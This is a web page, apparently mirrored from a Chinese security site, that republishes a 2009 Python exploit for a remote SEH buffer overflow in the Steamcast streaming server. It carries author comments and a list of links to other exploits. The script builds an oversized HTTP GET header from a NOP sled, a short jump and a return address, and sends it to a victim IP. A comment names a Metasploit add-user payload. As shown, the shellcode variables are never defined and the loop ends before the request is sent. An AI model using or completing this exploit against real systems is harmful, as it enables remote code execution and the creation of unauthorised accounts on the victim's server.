首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
来源:www.vfcocus.net 作者:His0k4 发布时间:2009-04-14  

#[*] Usage   : steamcast.py [victime_ip]
#[*] Bug     : Steamcast(HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
#[*] Founder : Luigi Auriemma, thx to overflow3r for informing me about the vuln.       
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] Translate by Cyb3r-1st : esse7 embe7 embou :p

#Short Description : The previous exploit runs  small shellcodes only, this one is the opposite :)
#Note : The problem is that we need to find a dll wich its not compiled with GS, in my case i founded idmmbc its a loaded dll of internet download manager so try to find an unsafe dll.
#Other note : The shellcode will be executed when the program will be closed.
#Another one : When you have problems with running the exploit msg me before you msg str0ke.

import sys, socket
import struct

host = sys.argv[1]
port = 8000

# win32_adduser -  PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com


exploit = "\x90"*(1003-len(shellcode)) + shellcode + "\xEB\x06\x90\x90" + "\xDB\x27\x02\x10" + "\x90"*20 + shellunt

#It needs a loop to works
while 1:
 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((host, port))
 head =  "GET / HTTP/1.1\r\n"
 head += "Host: "+host+"\r\n"
 head += exploit+"\r\n"
 head += "\r\n\r\n"


[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·Steamcast (HTTP Request) Remot
·BulletProof FTP Client 2009 (.
·ftpdmin 0.96 Arbitrary File Di
·ASP Product Catalog 1.0 (XSS/D
·Mini-stream Ripper .m3
·Shadow Stream Recorder (.m3u f
·Mini-stream RM-MP3 Converter 3
·Easy RM to MP3 Converter Unive
·ASX to MP3 Converter .
·Steamcast 0.9.75b Remote Denia
·RM Downloader .m3u Uni
·OpenBSD <= 4.5 IP datagram Nul
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved